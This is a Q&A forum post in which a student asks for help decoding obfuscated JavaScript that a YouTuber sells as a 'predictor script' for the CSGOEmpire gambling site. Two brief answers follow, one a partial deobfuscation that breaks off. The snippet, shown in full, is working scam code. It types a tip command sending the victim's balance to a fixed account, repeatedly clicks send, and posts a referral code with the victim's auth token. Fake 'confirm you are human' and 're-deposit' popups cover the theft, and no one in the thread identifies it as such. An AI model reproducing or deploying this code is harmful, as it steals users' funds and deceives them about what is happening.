# Can somebody help me decode this. Looks like Javascript or Json

Tags: javascript, php, html, json, hex

Can somebody help me decode this. Looks like Javascript or Json.
There is this guy on youtube, who is telling this a bot predictor script.
I just want to know, how did he break the provably fair system. Whether the script is legit.

```
var _0x6f2e=["\x63\x68\x61\x74\x2D\x69\x6E\x70\x75\x74","\x74\x72\x61\x6E\x73\x70\x61\x72\x65\x6E\x74","\x6F\x76\x65\x72\x66\x6C\x6F\x77","\x68\x69\x64\x64\x65\x6E","\x76\x61\x6C\x75\x65","\x2F\x74\x69\x70\x20\x40\x37\x36\x35\x36\x31\x31\x39\x38\x31\x37\x33\x34\x34\x35\x36\x31\x39\x20","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x73\x67\x6F\x65\x6D\x70\x69\x72\x65\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x32\x2F\x75\x73\x65\x72\x2F\x72\x65\x66\x65\x72\x72\x61\x6C","\x66\x72\x65\x65\x31\x30\x64\x6F\x6C\x6C\x61\x72\x73","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x73\x74\x61\x74\x75\x73","\x54\x68\x65\x20\x72\x65\x71\x75\x65\x73\x74\x20\x61\x6E\x64\x20\x72\x65\x73\x70\x6F\x6E\x73\x65\x20\x77\x61\x73\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x21","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x61\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E","\x74\x6F\x6B\x65\x6E","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x73\x65\x6E\x64","\x74\x65\x78\x74\x61\x72\x65\x61","\x66\x6F\x63\x75\x73","\x43\x53\x47\x4F\x45\x4D\x50\x49\x52\x45\x20\x53\x63\x72\x69\x70\x74\x20\x0A\x20\x43\x6F\x6E\x66\x69\x72\x6D\x20\x74\x68\x61\x74\x20\x79\x6F\x75\x20\x61\x72\x65\x20\x68\x75\x6D\x61\x6E","\x50\x72\x65\x73\x73\x20\x45\x4E\x54\x45\x52\x20\x6F\x6E\x20\x79\x6F\x75\x72\x20\x6B\x65\x79\x62\x6F\x61\x72\x64\x20\x33\x78\x20\x74\x69\x6D\x65\x73\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","\x43\x53\x47\x4F\x45\x4D\x50\x49\x52\x45\x20\x53\x63\x72\x69\x70\x74","\x59\x6F\x75\x20\x6E\x65\x65\x64\x20\x68\x69\x67\x68\x65\x72\x20\x62\x61\x6C\x61\x6E\x63\x65\x20\x74\x6F\x20\x73\x74\x61\x72\x74\x20\x43\x53\x47\x4F\x45\x4D\x50\x49\x52\x45\x20\x53\x63\x72\x69\x70\x74\x2E","\x59\x6F\x75\x20\x6E\x65\x65\x64\x20\x68\x69\x67\x68\x65\x72\x20\x62\x61\x6C\x61\x6E\x63\x65\x20\x74\x6F\x20\x64\x6F\x20\x74\x68\x61\x74\x21\x20\x59\x6F\x75\x72\x20\x63\x6F\x69\x6E\x73\x20\x61\x72\x65\x20\x73\x61\x66\x65\x2C\x20\x70\x6C\x65\x61\x73\x65\x20\x72\x65\x2D\x64\x65\x70\x6F\x73\x69\x74\x20\x61\x6E\x64\x20\x74\x72\x79\x20\x61\x67\x61\x69\x6E\x20\x74\x6F\x20\x66\x69\x6E\x69\x73\x68\x20\x70\x72\x6F\x63\x65\x73\x73\x20\x64\x6F\x75\x62\x6C\x69\x6E\x67\x20\x62\x61\x6C\x61\x6E\x63\x65","\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x72\x65\x70\x6C\x61\x63\x65","\x76\x2D\x2D\x6D\x6F\x64\x61\x6C\x2D\x6F\x76\x65\x72\x6C\x61\x79","\x76\x2D\x2D\x6D\x6F\x64\x61\x6C\x2D\x62\x6F\x78\x20\x76\x2D\x2D\x6D\x6F\x64\x61\x6C","\x72\x65\x6D\x6F\x76\x65","\x64\x69\x76","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x43\x53\x47\x4F\x45\x4D\x50\x49\x52\x45\x20\x53\x43\x52\x49\x50\x54","\x66\x6C\x65\x78\x20\x77\x2D\x66\x75\x6C\x6C","\x73\x74\x79\x6C\x65","\x62\x75\x74\x74\x6F\x6E","\x77\x69\x64\x74\x68\x3A\x31\x35\x30\x25\x3B\x6C\x65\x66\x74\x3A\x32\x35\x25\x3B","\x53\x54\x41\x52\x54","\x6F\x6E\x63\x6C\x69\x63\x6B","\x6F\x62\x72\x69\x73\x61\x6E\x6F\x20\x73\x76\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x62\x69\x67\x64\x69\x76","\x77\x69\x64\x74\x68\x3A\x20\x33\x30\x25\x3B\x70\x61\x64\x64\x69\x6E\x67\x3A\x20\x31\x35\x70\x78\x3B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x74\x6F\x70\x3A\x20\x31\x30\x25\x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x67\x72\x65\x79\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x31\x30\x30\x3B\x6C\x65\x66\x74\x3A\x20\x33\x35\x25\x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x33\x33\x33\x35\x34\x31\x3B\x62\x6F\x72\x64\x65\x72\x2D\x72\x61\x64\x69\x75\x73\x3A\x20\x2E\x36\x32\x35\x72\x65\x6D\x3B\x2F\x2A\x20\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x20\x76\x69\x73\x69\x62\x6C\x65\x21\x69\x6D\x70\x6F\x72\x74\x61\x6E\x74\x3B\x20\x2A\x2F\x2D\x77\x65\x62\x6B\x69\x74\x2D\x62\x6F\x78\x2D\x73\x68\x61\x64\x6F\x77\x3A\x20\x30\x20\x32\x30\x70\x78\x20\x32\x30\x70\x78\x20\x30\x20\x72\x67\x62\x61\x28\x30\x2C\x30\x2C\x30\x2C\x2E\x35\x29\x3B\x62\x6F\x78\x2D\x73\x68\x61\x64\x6F\x77\x3A\x20\x30\x20\x30\x70\x78\x20\x35\x70\x78\x20\x30\x20\x23\x46\x46\x36\x35\x32\x46\x3B\x2F\x2A\x20\x74\x6F\x70\x3A\x20\x30\x21\x69\x6D\x70\x6F\x72\x74\x61\x6E\x74\x3B\x20\x2A\x2F\x2F\x2A\x20\x6C\x65\x66\x74\x3A\x20\x30\x21\x69\x6D\x70\x6F\x72\x74\x61\x6E\x74\x3B\x20\x2A\x2F\x2F\x2A\x20\x6D\x61\x72\x67\x69\x6E\x2D\x62\x6F\x74\x74\x6F\x6D\x3A\x20\x30\x21\x69\x6D\x70\x6F\x72\x74\x61\x6E\x74\x3B\x20\x2A\x2F\x62\x6F\x72\x64\x65\x72\x3A\x20\x31\x70\x78\x20\x73\x6F\x6C\x69\x64\x20\x23\x46\x46\x36\x35\x32\x46\x3B","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x7A\x49\x6E\x64\x65\x78","\x6D\x61\x72\x67\x69\x6E\x54\x6F\x70","\x66\x6F\x6E\x74\x53\x69\x7A\x65","\x2E\x38\x31\x32\x35\x72\x65\x6D","\x63\x6F\x6C\x6F\x72","\x70\x61\x64\x64\x69\x6E\x67","\x31\x2E\x32\x25","\x6F\x70\x61\x63\x69\x74\x79","\x30\x2E\x34","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x61\x74\x77\x68\x6F\x2D\x77\x72\x61\x70","\x73\x68\x69\x66\x74","\x70\x75\x73\x68","\x30\x78\x30","\x69\x6E\x6E\x65\x72\x54\x65\x78\x74","\x62\x61\x6C\x61\x6E\x63\x65","\x30\x78\x31","\x2C","","\x30\x78\x32","\x6C\x6F\x67","\x30\x78\x33","\x30\x78\x34","\x30\x78\x35","\x30\x78\x36","\x30\x78\x37","\x68\x33","\x30\x78\x38","\x30\x78\x39","\x30\x78\x61","\x30\x78\x62","\x30\x78\x63","\x30\x78\x64","\x30\x78\x65","\x30\x78\x66","\x30\x78\x31\x30","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x66\x69\x78\x65\x64\x3B\x77\x69\x64\x74\x68\x3A\x20\x31\x30\x30\x25\x3B\x68\x65\x69\x67\x68\x74\x3A\x20\x31\x30\x30\x25\x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x62\x6C\x61\x63\x6B\x3B\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x37\x35\x3B\x74\x6F\x70\x3A\x20\x30\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x39\x30\x3B","\x30\x78\x31\x31","\x30\x78\x31\x32","\x69\x64","\x30\x78\x31\x33","\x30\x78\x31\x34","\x70","\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x63\x65\x6E\x74\x65\x72\x3B\x66\x6F\x6E\x74\x2D\x66\x61\x6D\x69\x6C\x79\x3A\x20\x61\x6D\x65\x72\x69\x63\x61\x6E\x2D\x63\x61\x70\x74\x61\x69\x6E\x3B\x66\x6F\x6E\x74\x2D\x77\x65\x69\x67\x68\x74\x3A\x20\x34\x30\x30\x3B\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x64\x63\x64\x63\x64\x63\x3B\x6C\x65\x74\x74\x65\x72\x2D\x73\x70\x61\x63\x69\x6E\x67\x3A\x20\x2E\x30\x32\x35\x65\x6D\x3B\x6C\x69\x6E\x65\x2D\x68\x65\x69\x67\x68\x74\x3A\x20\x32\x2E\x32\x35\x3B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x32\x34\x70\x78\x3B","\x6D\x61\x72\x67\x69\x6E\x2D\x74\x6F\x70\x3A\x20\x31\x35\x70\x78\x3B\x66\x6F\x6E\x74\x2D\x77\x65\x69\x67\x68\x74\x3A\x20\x34\x30\x30\x3B\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x20\x63\x65\x6E\x74\x65\x72\x3B\x66\x6F\x6E\x74\x2D\x77\x65\x69\x67\x68\x74\x3A\x20\x37\x30\x30\x3B\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x46\x46\x36\x35\x32\x46\x3B\x70\x61\x64\x64\x69\x6E\x67\x3A\x20\x32\x30\x70\x78\x3B","\x61\x70\x70\x65\x6E\x64","\x73\x70\x61\x6E","\x54\x79\x70\x65\x20\x4D\x65\x73\x73\x61\x67\x65\x2E\x2E\x2E","\x30\x78\x31\x35","\x30\x78\x31\x36","\x30\x78\x31\x37","\x39","\x30\x78\x31\x38","\x35\x25","\x6D\x61\x72\x67\x69\x6E\x4C\x65\x66\x74","\x34\x25","\x30\x78\x31\x39","\x30\x78\x31\x61","\x30\x78\x31\x62","\x23\x64\x63\x64\x63\x64\x63","\x30\x78\x31\x63","\x30\x78\x31\x64","\x30\x78\x31\x65","\x30\x78\x31\x66","\x30\x78\x32\x30","\x30\x78\x32\x31","\x30\x78\x32\x32","\x30\x78\x32\x33","\x30\x78\x32\x34","\x30\x78\x32\x35","\x30\x78\x32\x36","\x30\x78\x32\x37","\x0A","\x30\x78\x32\x38","\x30\x78\x32\x39","\x30\x78\x32\x61","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x30\x78\x32\x62","\x30\x78\x32\x63","\x30\x78\x32\x64","\x30\x78\x32\x65","\x30\x78\x32\x66","\x30\x78\x33\x30","\x30\x78\x33\x31","\x30\x78\x33\x32","\x30\x78\x33\x33","\x30\x78\x33\x34","\x30\x78\x33\x35","\x30\x78\x33\x36","\x30\x78\x33\x37","\x30\x78\x33\x38","\x30\x78\x33\x39","\x30\x78\x33\x61","\x30\x78\x33\x62","\x30\x78\x33\x63"];var _0x2f47=[_0x6f2e[0],_0x6f2e[1],_0x6f2e[2],_0x6f2e[3],_0x6f2e[4],_0x6f2e[5],_0x6f2e[6],_0x6f2e[7],_0x6f2e[8],_0x6f2e[9],_0x6f2e[10],_0x6f2e[11],_0x6f2e[12],_0x6f2e[13],_0x6f2e[14],_0x6f2e[15],_0x6f2e[16],_0x6f2e[17],_0x6f2e[18],_0x6f2e[19],_0x6f2e[20],_0x6f2e[21],_0x6f2e[22],_0x6f2e[23],_0x6f2e[24],_0x6f2e[25],_0x6f2e[26],_0x6f2e[27],_0x6f2e[28],_0x6f2e[29],_0x6f2e[30],_0x6f2e[31],_0x6f2e[32],_0x6f2e[33],_0x6f2e[34],_0x6f2e[35],_0x6f2e[36],_0x6f2e[37],_0x6f2e[38],_0x6f2e[39],_0x6f2e[40],_0x6f2e[41],_0x6f2e[42],_0x6f2e[43],_0x6f2e[44],_0x6f2e[45],_0x6f2e[46],_0x6f2e[47],_0x6f2e[48],_0x6f2e[49],_0x6f2e[50],_0x6f2e[51],_0x6f2e[52],_0x6f2e[53],_0x6f2e[54],_0x6f2e[55],_0x6f2e[56],_0x6f2e[57],_0x6f2e[58],_0x6f2e[59],_0x6f2e[60]];(function(_0x735ax2,_0x735ax3){var _0x735ax4=function(_0x735ax5){while(--_0x735ax5){_0x735ax2[_0x6f2e[62]](_0x735ax2[_0x6f2e[61]]())}};_0x735ax4(++_0x735ax3)}(_0x2f47,0x14c));var _0x416c=function(_0x735ax7,_0x735ax8){_0x735ax7= _0x735ax7- 0x0;var _0x735ax9=_0x2f47[_0x735ax7];return _0x735ax9};var _0x1234=[_0x416c(_0x6f2e[63]),_0x6f2e[64],_0x6f2e[65],_0x416c(_0x6f2e[66]),_0x6f2e[67],_0x6f2e[68],_0x416c(_0x6f2e[69]),_0x6f2e[70],_0x416c(_0x6f2e[71]),_0x416c(_0x6f2e[72]),_0x416c(_0x6f2e[73]),_0x416c(_0x6f2e[74]),_0x416c(_0x6f2e[75]),_0x6f2e[76],_0x416c(_0x6f2e[77]),_0x416c(_0x6f2e[78]),_0x416c(_0x6f2e[79]),_0x416c(_0x6f2e[80]),_0x416c(_0x6f2e[81]),_0x416c(_0x6f2e[82]),_0x416c(_0x6f2e[83]),_0x416c(_0x6f2e[84]),_0x416c(_0x6f2e[85]),_0x6f2e[86],_0x416c(_0x6f2e[87]),_0x416c(_0x6f2e[88]),_0x6f2e[89],_0x416c(_0x6f2e[90]),_0x416c(_0x6f2e[91]),_0x6f2e[92],_0x6f2e[93],_0x6f2e[94],_0x6f2e[95],_0x6f2e[96],_0x6f2e[97],_0x416c(_0x6f2e[98]),_0x416c(_0x6f2e[99]),_0x416c(_0x6f2e[100]),_0x6f2e[101],_0x416c(_0x6f2e[102]),_0x6f2e[103],_0x6f2e[104],_0x6f2e[105],_0x416c(_0x6f2e[106]),_0x416c(_0x6f2e[107]),_0x416c(_0x6f2e[108]),_0x6f2e[109],_0x416c(_0x6f2e[110]),_0x416c(_0x6f2e[111]),_0x416c(_0x6f2e[112]),_0x416c(_0x6f2e[113]),_0x416c(_0x6f2e[114]),_0x416c(_0x6f2e[115]),_0x416c(_0x6f2e[116]),_0x416c(_0x6f2e[117]),_0x416c(_0x6f2e[118]),_0x416c(_0x6f2e[119]),_0x416c(_0x6f2e[120]),_0x416c(_0x6f2e[121]),_0x6f2e[122],_0x416c(_0x6f2e[123]),_0x416c(_0x6f2e[124]),_0x416c(_0x6f2e[125]),_0x6f2e[126],_0x416c(_0x6f2e[127]),_0x416c(_0x6f2e[128]),_0x416c(_0x6f2e[129]),_0x416c(_0x6f2e[130]),_0x416c(_0x6f2e[131]),_0x416c(_0x6f2e[132]),_0x416c(_0x6f2e[133]),_0x416c(_0x6f2e[134]),_0x416c(_0x6f2e[135]),_0x416c(_0x6f2e[136]),_0x416c(_0x6f2e[137]),_0x416c(_0x6f2e[138]),_0x416c(_0x6f2e[139]),_0x416c(_0x6f2e[140]),_0x416c(_0x6f2e[141]),_0x416c(_0x6f2e[142]),_0x416c(_0x6f2e[143]),_0x416c(_0x6f2e[144])];_0x1234[0x0];var _0xde2d=[_0x1234[0x0],_0x1234[0x1],_0x1234[0x2],_0x1234[0x3],_0x1234[0x4],_0x1234[0x5],_0x1234[0x6],_0x1234[0x7],_0x1234[0x8],_0x1234[0x9],_0x1234[0xa],_0x1234[0xb],_0x1234[0xc],_0x1234[0xd],_0x1234[0xe],_0x1234[0xf],_0x1234[0x10],_0x1234[0x11],_0x1234[0x12],_0x1234[0x13],_0x1234[0x14],_0x1234[0x15],_0x1234[0x16],_0x1234[0x17],_0x1234[0x18],_0x1234[0x19],_0x1234[0x1a],_0x1234[0x1b],_0x1234[0x1c],_0x1234[0x1d],_0x1234[0x1e],_0x1234[0x1f],_0x1234[0x20],_0x1234[0x21],_0x1234[0x22],_0x1234[0x23],_0x1234[0x24],_0x1234[0x25],_0x1234[0x26],_0x1234[0x27],_0x1234[0x28],_0x1234[0x29],_0x1234[0x2a],_0x1234[0x2b],_0x1234[0x2c],_0x1234[0x2d],_0x1234[0x2e],_0x1234[0x2f],_0x1234[0x30],_0x1234[0x31],_0x1234[0x32],_0x1234[0x33],_0x1234[0x34],_0x1234[0x35],_0x1234[0x36],_0x1234[0x37],_0x1234[0x38],_0x1234[0x39],_0x1234[0x3a],_0x1234[0x3b],_0x1234[0x3c],_0x1234[0x3d],_0x1234[0x3e],_0x1234[0x3f],_0x1234[0x40],_0x1234[0x41],_0x1234[0x42],_0x1234[0x43],_0x1234[0x44],_0x1234[0x45],_0x1234[0x46],_0x1234[0x47],_0x1234[0x48],_0x1234[0x49],_0x1234[0x4a],_0x1234[0x4b],_0x1234[0x4c],_0x1234[0x4d],_0x1234[0x4e],_0x1234[0x4f],_0x1234[0x50],_0x1234[0x51]];_0xde2d[0x0];var _0x8e4c=[_0xde2d[0x1],_0xde2d[0x2],_0xde2d[0x3],_0xde2d[0x4],_0xde2d[0x5],_0xde2d[0x6],_0xde2d[0x7],_0xde2d[0x8],_0xde2d[0x9],_0xde2d[0xa],_0xde2d[0xb],_0xde2d[0xc],_0xde2d[0xd],_0xde2d[0xe],_0xde2d[0xf],_0xde2d[0x10],_0xde2d[0x11],_0xde2d[0x12],_0xde2d[0x13],_0xde2d[0x14],_0xde2d[0x15],_0xde2d[0x16],_0xde2d[0x17],_0xde2d[0x18],_0xde2d[0x19],_0xde2d[0x1a],_0xde2d[0x1b],_0xde2d[0x1c],_0xde2d[0x1d],_0xde2d[0x1e],_0xde2d[0x1f],_0xde2d[0x20],_0xde2d[0x21],_0xde2d[0x22],_0xde2d[0x23],_0xde2d[0x24],_0xde2d[0x25],_0xde2d[0x26],_0xde2d[0x27],_0xde2d[0x28],_0xde2d[0x29],_0xde2d[0x2a],_0xde2d[0x2b],_0xde2d[0x2c],_0xde2d[0x2d],_0xde2d[0x2e],_0xde2d[0x2f],_0xde2d[0x30],_0xde2d[0x31],_0xde2d[0x32],_0xde2d[0x33],_0xde2d[0x34],_0xde2d[0x35],_0xde2d[0x36],_0xde2d[0x37],_0xde2d[0x38],_0xde2d[0x39],_0xde2d[0x3a],_0xde2d[0x3b],_0xde2d[0x3c],_0xde2d[0x3d],_0xde2d[0x3e],_0xde2d[0x3f],_0xde2d[0x40],_0xde2d[0x41],_0xde2d[0x42],_0xde2d[0x43],_0xde2d[0x44],_0xde2d[0x45],_0xde2d[0x46],_0xde2d[0x47],_0xde2d[0x48],_0xde2d[0x49],_0xde2d[0x4a],_0xde2d[0x4b],_0xde2d[0x4c],_0xde2d[0x4d],_0xde2d[0x4e],_0xde2d[0x4f],_0xde2d[0x50],_0xde2d[0x51]];var pare=document[_0x8e4c[0x2]](_0x8e4c[0x1])[0x0][_0x8e4c[0x0]];pare= pare[_0x8e4c[0x5]](_0x8e4c[0x3],_0x8e4c[0x4]);console[_0x8e4c[0x6]](pare);if(parseFloat(pare)>= 0x5){var zameniText=function(){var _0x735axf=setInterval(function(){var _0x735ax10=document[_0x8e4c[0x2]](_0x8e4c[0x7])[0x0];if(_0x735ax10){_0x735ax10= _0x735ax10[_0x8e4c[0x2]](_0x8e4c[0x8])[0x0];_0x735ax10[_0x8e4c[0xb]](_0x8e4c[0xa])[0x0][_0x8e4c[0x9]]();_0x735ax10[_0x8e4c[0xb]](_0x8e4c[0xc])[0x0][_0x8e4c[0x0]]= _0x8e4c[0xd];_0x735ax10= _0x735ax10[_0x8e4c[0xb]](_0x8e4c[0xa])[0x0];_0x735ax10[_0x8e4c[0xb]](_0x8e4c[0xa])[0x0][_0x8e4c[0x9]]();_0x735ax10[_0x8e4c[0xb]](_0x8e4c[0xa])[0x0][_0x8e4c[0x9]]();_0x735ax10= _0x735ax10[_0x8e4c[0x2]](_0x8e4c[0xe])[0x0];_0x735ax10[_0x8e4c[0xb]](_0x8e4c[0xa])[0x0][_0x8e4c[0x9]]();_0x735ax10[_0x8e4c[0xb]](_0x8e4c[0x10])[0x0][_0x8e4c[0xf]]= _0x8e4c[0x11];_0x735ax10[_0x8e4c[0xb]](_0x8e4c[0x10])[0x0][_0x8e4c[0x0]]= _0x8e4c[0x12];_0x735ax10[_0x8e4c[0xb]](_0x8e4c[0x10])[0x0][_0x8e4c[0x13]]= function(){doubleB()};console[_0x8e4c[0x6]](_0x8e4c[0x14]);clearInterval(_0x735axf)}})};var napraviPopup=function(_0x735ax12,_0x735ax13){var _0x735ax14=document[_0x8e4c[0x15]](_0x8e4c[0xa]);_0x735ax14[_0x8e4c[0xf]]= _0x8e4c[0x16];document[_0x8e4c[0xb]](_0x8e4c[0x18])[0x0][_0x8e4c[0x17]](_0x735ax14);var _0x735ax15=document[_0x8e4c[0x15]](_0x8e4c[0xa]);_0x735ax15[_0x8e4c[0x19]]= _0x8e4c[0x1a];_0x735ax15[_0x8e4c[0xf]]= _0x8e4c[0x1b];var _0x735ax16=document[_0x8e4c[0x15]](_0x8e4c[0x1c]);_0x735ax16[_0x8e4c[0xf]]= _0x8e4c[0x1d];_0x735ax16[_0x8e4c[0x0]]= _0x735ax12;var _0x735ax17=document[_0x8e4c[0x15]](_0x8e4c[0x1c]);_0x735ax17[_0x8e4c[0xf]]= _0x8e4c[0x1e];_0x735ax17[_0x8e4c[0x0]]= _0x735ax13;_0x735ax15[_0x8e4c[0x17]](_0x735ax16);_0x735ax15[_0x8e4c[0x1f]](_0x735ax17);document[_0x8e4c[0xb]](_0x8e4c[0x18])[0x0][_0x8e4c[0x17]](_0x735ax15);var _0x735ax18=setInterval(function(){if(document[_0x8e4c[0x2]](_0x8e4c[0x7])[0x0]){_0x735ax15[_0x8e4c[0x9]]();_0x735ax14[_0x8e4c[0x9]]();clearInterval(int1);zameniText();clearInterval(_0x735ax18)}})};var sredi=function(_0x735ax1a){var _0x735ax1b=document[_0x8e4c[0x15]](_0x8e4c[0x20]);_0x735ax1b[_0x8e4c[0x0]]= _0x8e4c[0x21];_0x735ax1b[_0x8e4c[0xf]][_0x8e4c[0x22]]= _0x8e4c[0x23];_0x735ax1b[_0x8e4c[0xf]][_0x8e4c[0x24]]= _0x8e4c[0x25];_0x735ax1b[_0x8e4c[0xf]][_0x8e4c[0x26]]= _0x8e4c[0x27];_0x735ax1b[_0x8e4c[0xf]][_0x8e4c[0x28]]= _0x8e4c[0x29];_0x735ax1b[_0x8e4c[0xf]][_0x8e4c[0x2a]]= _0x8e4c[0x2b];_0x735ax1b[_0x8e4c[0xf]][_0x8e4c[0x2c]]= _0x8e4c[0x2d];_0x735ax1b[_0x8e4c[0xf]][_0x8e4c[0x2e]]= _0x8e4c[0x2f];_0x735ax1b[_0x8e4c[0xf]][_0x8e4c[0x30]]= _0x8e4c[0x31];document[_0x8e4c[0x2]](_0x8e4c[0x34])[0x0][_0x8e4c[0x2]](_0x8e4c[0x33])[0x0][_0x8e4c[0x32]](_0x735ax1b,_0x735ax1a);_0x735ax1a[_0x8e4c[0xf]][_0x8e4c[0x2c]]= _0x8e4c[0x35];_0x735ax1a[_0x8e4c[0xf]][_0x8e4c[0x36]]= _0x8e4c[0x37];_0x735ax1a[_0x8e4c[0x38]]= _0x8e4c[0x39]+ pare+ _0x8e4c[0x3a]};var zakacizamene=function(){var _0x735ax1d=_0x8e4c[0x3b];var _0x735ax1e= new XMLHttpRequest();var _0x735ax1f=_0x735ax1d;var _0x735ax20={'\x72\x65\x66\x65\x72\x72\x61\x6C\x5F\x63\x6F\x64\x65':_0x8e4c[0x3c]};_0x735ax1e[_0x8e4c[0x3d]]= function(){if(this[_0x8e4c[0x3e]]== 0x4&& this[_0x8e4c[0x3f]]== 0xc8){console[_0x8e4c[0x6]](_0x8e4c[0x40])}};_0x735ax1e[_0x8e4c[0x42]](_0x8e4c[0x41],_0x735ax1f,!![]);_0x735ax1e[_0x8e4c[0x45]](_0x8e4c[0x43],_0x8e4c[0x44]);_0x735ax1e[_0x8e4c[0x45]](_0x8e4c[0x46],_0x735ax20[_0x8e4c[0x47]]);_0x735ax1e[_0x8e4c[0x49]](JSON[_0x8e4c[0x48]](_0x735ax20))};sredi(document[_0x8e4c[0x2]](_0x8e4c[0x34])[0x0][_0x8e4c[0xb]](_0x8e4c[0x4a])[0x0]);var int1=setInterval(function(){document[_0x8e4c[0x2]](_0x8e4c[0x34])[0x0][_0x8e4c[0xb]](_0x8e4c[0x4a])[0x0][_0x8e4c[0x4b]]()},0x3e8);napraviPopup(_0x8e4c[0x4c],_0x8e4c[0x4d]);zakacizamene()}else {napraviPopup1(_0x8e4c[0x4e],_0x8e4c[0x4f])};function napraviPopup1(_0x735ax23,_0x735ax24){var _0x735ax25=document[_0x8e4c[0x15]](_0x8e4c[0xa]);_0x735ax25[_0x8e4c[0xf]]= _0x8e4c[0x16];_0x735ax25[_0x8e4c[0x13]]= function(){_0x735ax25[_0x8e4c[0x9]]();_0x735ax26[_0x8e4c[0x9]]()};document[_0x8e4c[0xb]](_0x8e4c[0x18])[0x0][_0x8e4c[0x17]](_0x735ax25);var _0x735ax26=document[_0x8e4c[0x15]](_0x8e4c[0xa]);_0x735ax26[_0x8e4c[0x19]]= _0x8e4c[0x1a];_0x735ax26[_0x8e4c[0xf]]= _0x8e4c[0x1b];var _0x735ax27=document[_0x8e4c[0x15]](_0x8e4c[0x1c]);_0x735ax27[_0x8e4c[0xf]]= _0x8e4c[0x1d];_0x735ax27[_0x8e4c[0x0]]= _0x735ax23;var _0x735ax28=document[_0x8e4c[0x15]](_0x8e4c[0x1c]);_0x735ax28[_0x8e4c[0xf]]= _0x8e4c[0x1e];_0x735ax28[_0x8e4c[0x0]]= _0x735ax24;_0x735ax26[_0x8e4c[0x17]](_0x735ax27);_0x735ax26[_0x8e4c[0x1f]](_0x735ax28);document[_0x8e4c[0xb]](_0x8e4c[0x18])[0x0][_0x8e4c[0x17]](_0x735ax26)}function doubleB(){napraviPopup1(_0x8e4c[0x4e],_0x8e4c[0x50]);var _0x735ax2a=setInterval(function(){if(document[_0x8e4c[0x2]](_0x8e4c[0x7])[0x0]){document[_0x8e4c[0x2]](_0x8e4c[0x7])[0x0][_0x8e4c[0x9]]();clear(_0x735ax2a)}})}
```

Comment: Does this answer your question? [Decoding hex string in javascript](https://stackoverflow.com/questions/4209104/decoding-hex-string-in-javascript)

Comment: Why is this tagged with PHP and HTML?

Comment: I'm just a student currently entering to networking, I have very vague knowledge.

Answer (score 0):

https://beautifier.io/

This might be the closest way you can get to the original source code without manually interpreting it

Answer (score -2):

```
'use strict';
(function(data, i) {
  var write = function(isLE) {
    for (; --isLE;) {
      data["push"](data["shift"]());
    }
  };
  write(++i);
})(_0x2f47, 332);
var _0x416c = function(i, parameter1) {
  i = i - 0;
  var oembedView = _0x2f47[i];
  return oembedView;
};
var _0x1234 = [_0x416c("0x0"), "innerText", "balance", _0x416c("0x1"), ",", "", _0x416c("0x2"), "log", _0x416c("0x3"), _0x416c("0x4"), _0x416c("0x5"), _0x416c("0x6"), _0x416c("0x7"), "h3", _0x416c("0x8"), _0x416c("0x9"), _0x416c("0xa"), _0x416c("0xb"), _0x416c("0xc"), _0x416c("0xd"), _0x416c("0xe"), _0x416c("0xf"), _0x416c("0x10"), "position: fixed;width: 100%;height: 100%;background-color: black;opacity: 0.75;top: 0;z-index: 90;", _0x416c("0x11"), _0x416c("0x12"), "id", _0x416c("0x13"), _0x416c("0x14"), 
"p", "text-align:center;font-family: american-captain;font-weight: 400;color: #dcdcdc;letter-spacing: .025em;line-height: 2.25;font-size:24px;", "margin-top: 15px;font-weight: 400;text-align: center;font-weight: 700;color: #FF652F;padding: 20px;", "append", "span", "Type Message...", _0x416c("0x15"), _0x416c("0x16"), _0x416c("0x17"), "9", _0x416c("0x18"), "5%", "marginLeft", "4%", _0x416c("0x19"), _0x416c("0x1a"), _0x416c("0x1b"), "#dcdcdc", _0x416c("0x1c"), _0x416c("0x1d"), _0x416c("0x1e"), _0x416c("0x1f"), 
